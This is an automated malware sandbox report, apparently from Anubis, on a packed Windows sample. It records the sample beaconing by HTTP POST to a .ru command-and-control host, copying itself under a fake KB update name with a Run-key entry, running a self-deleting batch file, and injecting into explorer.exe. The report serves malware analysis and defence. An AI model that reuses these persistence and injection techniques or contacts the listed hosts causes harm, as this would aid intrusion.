a) Registry Activities
b) File Activities
- msmsgs.exe
a) Registry Activities
b) File Activities
- reader_sl.exe
a) Registry Activities
b) File Activities
- wscntfy.exe
a) Registry Activities
b) File Activities
- kxuckd.exe
a) File Activities
- drlwszvxbeo.exe
a) Registry Activities
b) File Activities
- cmd.exe
a) Registry Activities
b) File Activities
[#############################################################################]
1. General Information
[#############################################################################]
[=============================================================================]
Information about Anubis' invocation
[=============================================================================]
Time needed: 252 s
Report created: 02/28/12, 19:34:48 UTC
Termination reason: Timeout
Program version: 1.75.3394
[=============================================================================]
Global Network Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
DNS Queries:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Name: [ hmvmgywkvayilcwh.ru ], Query Type: [ DNS_TYPE_A ],
Query Result: [ ], Successful: [ 0 ], Protocol: [ udp ]
Name: [ xvmzegestulhtvqz.ru ], Query Type: [ DNS_TYPE_A ],
Query Result: [ ], Successful: [ 0 ], Protocol: [ udp ]
Name: [ hjpyvexsutdctjol.ru ], Query Type: [ DNS_TYPE_A ],
Query Result: [ 46.137.85.218 62.183.104.36 78.107.82.98 94.20.30.91 124.124.212.172 184.106.151.78 184.172.134.158 208.109.171.99 211.44.250.173 ], Successful: [ 1 ], Protocol: [ udp ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
HTTP Conversations:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
From ANUBIS:1028 to 46.137.85.218:8080 - [ hjpyvexsutdctjol.ru:8080 ]
Request: [ POST /rwx/B3_d02/in/ ], Response: [ 200 "OK" ]
[#############################################################################]
2. bc9deebcb0.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Primary Analysis Subject
Filename: bc9deebcb0.exe
MD5: 7650a8aa7d4f891982f0ca24a24e9c0c
SHA-1: b3a32d512c1e28a269e7947da4807cd39bbb6ef3
File Size: 73216 Bytes
Command Line: "C:\bc9deebcb0.exe"
Process-status
at analysis end: dead
Exit Code: 0
[=============================================================================]
SigBuster Output
[=============================================================================]
UPX All_Versions SN:1634
[=============================================================================]
2.a) bc9deebcb0.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ AppData ], New Value: [ C:\Documents and Settings\Administrator\Application Data ]
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ],
Value Name: [ KB00983751.exe ], New Value: [ "C:\Documents and Settings\Administrator\Application Data\KB00983751.exe" ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SOFTWARE\CLASSES\HTTP ],
Value Name: [ Source Filter ], Value: [ {E436EBB6-524F-11CE-9F53-0020AF0BA770} ], 2 times
Key: [ HKLM\SOFTWARE\Microsoft\CTF\SystemShared\ ],
Value Name: [ CUAS ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\Setup ],
Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\WPA\MediaCenter ],
Value Name: [ Installed ], Value: [ 0 ], 2 times
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
Value Name: [ wheel ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ],
Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ Cache ], Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ AppData ], Value: [ %USERPROFILE%\Application Data ], 1 time
[=============================================================================]
2.b) bc9deebcb0.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp ]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ C:\Program Files\Common Files\ ], Control Code: [ 0x00090028 ], 1 time
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ]
File Name: [ C:\WINDOWS\WindowsShell.Manifest ]
File Name: [ C:\WINDOWS\system32\Apphelp.dll ]
File Name: [ C:\WINDOWS\system32\MSCTF.dll ]
File Name: [ C:\WINDOWS\system32\MSIMG32.DLL ]
File Name: [ C:\WINDOWS\system32\PSAPI.DLL ]
File Name: [ C:\WINDOWS\system32\SHELL32.DLL ]
File Name: [ C:\WINDOWS\system32\TAPI32.DLL ]
File Name: [ C:\WINDOWS\system32\WINMM.dll ]
File Name: [ C:\WINDOWS\system32\cmd.exe ]
File Name: [ C:\WINDOWS\system32\comctl32.dll ]
File Name: [ C:\WINDOWS\system32\imm32.dll ]
File Name: [ C:\WINDOWS\system32\rtutils.dll ]
File Name: [ C:\Windows\AppPatch\sysmain.sdb ]
File Name: [ C:\bc9deebcb0.exe ]
[=============================================================================]
2.c) bc9deebcb0.exe - Process Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Processes Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Executable: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ], Command Line: [ ]
Executable: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ], Command Line: [ ]
Executable: [ C:\WINDOWS\system32\cmd.exe ], Command Line: [ ]
Executable: [ ], Command Line: [ "C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT" ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Remote Threads Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Affected Process: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
Affected Process: [ C:\WINDOWS\system32\cmd.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Foreign Memory Regions Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Process: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
Process: [ C:\WINDOWS\system32\cmd.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Foreign Memory Regions Written:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Process: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
Process: [ C:\WINDOWS\system32\cmd.exe ]
[#############################################################################]
3. KB00983751.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Started by bc9deebcb0.exe
Filename: KB00983751.exe
MD5: 7650a8aa7d4f891982f0ca24a24e9c0c
SHA-1: b3a32d512c1e28a269e7947da4807cd39bbb6ef3
File Size: 73216 Bytes
Command Line: "C:\Documents and Settings\Administrator\Application Data\KB00983751.exe"
Process-status
at analysis end: dead
Exit Code: 0
[=============================================================================]
SigBuster Output
[=============================================================================]
UPX All_Versions SN:1634
[=============================================================================]
3.a) KB00983751.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SOFTWARE\CLASSES\HTTP ],
Value Name: [ Source Filter ], Value: [ {E436EBB6-524F-11CE-9F53-0020AF0BA770} ], 2 times
Key: [ HKLM\SOFTWARE\Microsoft\CTF\SystemShared\ ],
Value Name: [ CUAS ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
Value Name: [ wheel ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ],
Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
[=============================================================================]
3.b) KB00983751.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ C:\Program Files\Common Files\ ], Control Code: [ 0x00090028 ], 1 time
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 7 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ]
File Name: [ C:\WINDOWS\WindowsShell.Manifest ]
File Name: [ C:\WINDOWS\system32\MSCTF.dll ]
File Name: [ C:\WINDOWS\system32\MSIMG32.DLL ]
File Name: [ C:\WINDOWS\system32\PSAPI.DLL ]
File Name: [ C:\WINDOWS\system32\TAPI32.DLL ]
File Name: [ C:\WINDOWS\system32\WINMM.dll ]
File Name: [ C:\WINDOWS\system32\imm32.dll ]
File Name: [ C:\WINDOWS\system32\rtutils.dll ]
[=============================================================================]
3.c) KB00983751.exe - Process Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Remote Threads Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Affected Process: [ C:\WINDOWS\explorer.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Foreign Memory Regions Written:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Process: [ C:\WINDOWS\explorer.exe ]
[#############################################################################]
4. cmd.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Started by bc9deebcb0.exe
Filename: cmd.exe
MD5: 6d778e0f95447e6546553eeea709d03c
SHA-1: 811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1
File Size: 389120 Bytes
Command Line: "C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT"
Process-status
at analysis end: dead
Exit Code: 1
[=============================================================================]
4.a) cmd.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ],
Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time
Key: [ HKLM\SYSTEM\Setup ],
Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\WPA\MediaCenter ],
Value Name: [ Installed ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000120000006001000016000000610100001c000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ],
Value Name: [ cFormatTags ], Value: [ 3 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ aFormatTagCache ], Value: [ 0x010000001000000006000000120000000700000012000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ cFormatTags ], Value: [ 3 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ aFormatTagCache ], Value: [ 0x0100000010000000420000001c000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000003100000014000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000003001000016000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000002200000032000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ AutoRun ], Value: [ ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ CompletionChar ], Value: [ 64 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ DefaultColor ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ EnableExtensions ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ PathCompletionChar ], Value: [ 64 ], 1 time
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ midimapper ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.iac2 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.imaadpcm ], Value: [ ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.l3acm ], Value: [ C:\WINDOWS\system32\l3codeca.acm ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msadpcm ], Value: [ ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msaudio1 ], Value: [ msaud32.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msg711 ], Value: [ msg711.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msg723 ], Value: [ ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msgsm610 ], Value: [ msgsm32.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.sl_anet ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.trspch ], Value: [ tssoft32.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.I420 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.M261 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.M263 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.cvid ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv31 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv32 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv41 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv50 ], Value: [ ], 1 time
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iyuv ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.mrle ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.msvc ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.uyvy ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.yuy2 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.yvu9 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.yvyu ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ wavemapper ], Value: [ ], 2 times
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ DefaultLevel ], Value: [ 262144 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ PolicyScope ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ ItemData ], Value: [ 0x5eab304f957a49896a006c1c31154015 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ ItemSize ], Value: [ 779 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ ItemData ], Value: [ 0x67b0d48b343a3fd3bce9dc646704f394 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ ItemSize ], Value: [ 517 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ ItemData ], Value: [ 0x327802dcfef8c893dc8ab006dd847d1d ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ ItemSize ], Value: [ 918 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ ItemData ], Value: [ 0xbd9a2adb42ebd8560e250e4df8162f67 ], 1 time
